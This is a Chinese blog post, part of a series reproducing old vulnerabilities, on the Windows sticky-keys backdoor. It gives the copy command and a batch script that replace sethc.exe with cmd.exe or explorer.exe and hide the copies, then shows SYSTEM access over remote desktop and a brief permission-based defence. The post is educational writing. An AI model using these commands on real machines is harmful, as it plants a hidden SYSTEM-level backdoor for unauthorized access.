首页 技术分享,漏洞信息

引言

因为本菜鸡的博客没什么文章素材,所以想开一个新文章类别,本来想整一个漏洞分析和复现的,无奈由于实力不允许,只能再前面加一个“老”字,整一点多年前的老漏洞拿来复现和分析。俗话说得好,要善于总结前人的经验和智慧,才能在自己的前进道路上走得更快。
本系列在我能理解的范围内我都会详细讲解,我不能理解的就靠收集网上的资料了,引用会注明来源和作者,如有侵权请联系我删除。那么废话不多说,开始我们的新篇章,Here we go!

0x01 shift后门

说到这个东西就先提一下它的来源——Windows粘滞键
Windows粘滞键本身是为了不方便同时按组合键的人群使用的功能,在连按5次shift键后打开粘滞键,也就是启动了system32目录下的sethc.exe

在登入状态中,连按5次shift会以当前用户权限执行sethc.exe,而在登录界面还未登录时会默认以system用户(管理员权限)执行。

0x02 原理

原理也很简单,连按5次shift,windows会在system32目录下寻找sethc.exe并启动,我们只需要把cmd或者其他的shell程序替换掉,那么我们启动sethc.exe的时候就会默认以system用户执行我们的cmd,而且因为是系统自带的应用所以不会被杀毒软件检测

0x03 复现

如果我们在渗透过程中拿到较高权限的shell就可以直接在shell里面执行命令

copy C:\WINDOWS\system32\cmd.exe C:\windows\system32\sethc.exe

或者在拿到远程桌面后直接在系统里面替换
这里再贴一个用的比较广泛的批处理,具体步骤可以自己分析

@copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
@copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
@attrib c:\windows\system32\sethc.exe +h
@attrib c:\windows\system32\dllcache\sethc.exe +h
copy c:\windows\explorer.exe c:\windows\system32\sethc.exe
copy c:\windows\system32\sethc.exe c:\windows\system32\dllcache\sethc.exe
attrib c:\windows\system32\sethc.exe +h
attrib c:\windows\system32\dllcache\sethc.exe +h

我这里拿虚拟机做个演示,先打开3389端口

然后复制cmd到system32目录下并且命名sethc.exe,或者可以下载更隐藏的后门软件,我这里用的是黑基2012的后门,隐蔽性更高

替换成功

接下来我们用主机连接远程桌面试试

启动成功,并且为system权限

因为远程桌面存在时间限制自动断开连接,所以需要尽快添加用户

0x04 防御

防御方法其实也很简单粗暴,就是直接设置权限让所有人都用不了,这样无论是删除还是访问都会显示拒绝访问。
注意,这里不是直接删除,删除后系统可能会自动找回。

其实随着时代的发展,系统的更新换代,在权限分级更严格的今天,这种方法对很多系统已经不管用了,不过重要的是学到一个思路,说不定今后还能遇到用得上的地方呢




文章评论

    Terry 大佬ChromeWindows
    2020-10-9 11:07   回复

    宇神nb!

      YS_Neko 菜鸡ChromeWindows
      2020-10-9 15:20   回复

      齐大佬yyds

    强仔 大佬ChromeAndroid
    2020-10-7 11:14   回复

      YS_Neko 菜鸡ChromeWindows
      2020-10-7 11:18   回复

      只能写点老技术文章了

目录